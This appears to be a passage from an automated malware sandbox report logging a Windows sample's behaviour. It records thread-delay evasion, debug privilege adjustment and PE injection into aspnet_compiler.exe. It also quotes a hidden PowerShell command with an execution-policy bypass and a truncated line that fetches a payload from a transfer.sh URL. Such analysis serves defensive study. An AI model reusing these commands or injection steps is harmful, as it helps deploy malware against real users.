Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6424	Thread sleep time: -17524406870024063s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7028	Thread sleep count: 2648 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6936	Thread sleep count: 421 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6820	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6820	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -67255s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6440	Thread sleep count: 4538 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -67115s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6440	Thread sleep count: 5209 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep count: 45 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -66958s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -66802s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -66661s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -66505s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -66365s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -66208s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -66052s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -65911s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -65755s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -65615s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -65458s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -65302s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -65161s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -65005s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -64865s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -64708s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -64552s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -64411s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -64255s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -64115s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -63958s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -63802s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -63662s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -63505s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -63356s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -63207s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -63080s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -62958s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -62800s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -62658s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -62533s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -62415s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -62303s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -62157s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -62036s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -61895s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -61616s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -61418s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -61263s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -61024s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -60907s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -60772s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -60607s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -60434s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -60318s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -59504s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -59343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -59217s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -59092s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -56975s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -56839s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -56654s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -56541s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -56422s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6368	Thread sleep time: -56300s >= -30000s	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5896	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3545	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2648	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 421	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Window / User API: threadDelayed 4538	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Window / User API: threadDelayed 5209	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 67255	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 67115	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 66958	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 66802	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 66661	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 66505	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 66365	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 66208	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 66052	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 65911	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 65755	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 65615	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 65458	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 65302	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 65161	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 65005	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 64865	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 64708	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 64552	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 64411	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 64255	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 64115	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 63958	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 63802	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 63662	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 63505	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 63356	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 63207	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 63080	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 62958	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 62800	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 62658	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 62533	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 62415	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 62303	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 62157	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 62036	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 61895	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 61616	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 61418	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 61263	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 61024	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 60907	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 60772	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 60607	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 60434	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 60318	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59504	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59217	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59092	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 56975	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 56839	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 56654	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 56541	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 56422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 56300	Jump to behavior

Source: aspnet_compiler.exe, 0000000B.00000002.943104870.00000000014D5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk
Source: powershell.exe, 00000002.00000002.953825454.000001EE7C957000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8&)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 406000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 408000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 1174008	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoE -Nop -NonI -WIndoWSTYLe HiDdeN -ExecutionPolicy Bypass -file C:\ProgramData\PRESFGEQTFRWEEHBFXQXJU\PRESFGEQTFRWEEHBFXQXJU.ps1

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWERSHELL $Hx = 'https://transfer.sh/get/8J0O0I/Server435.txt';$HB=('{2}{0}{1}' 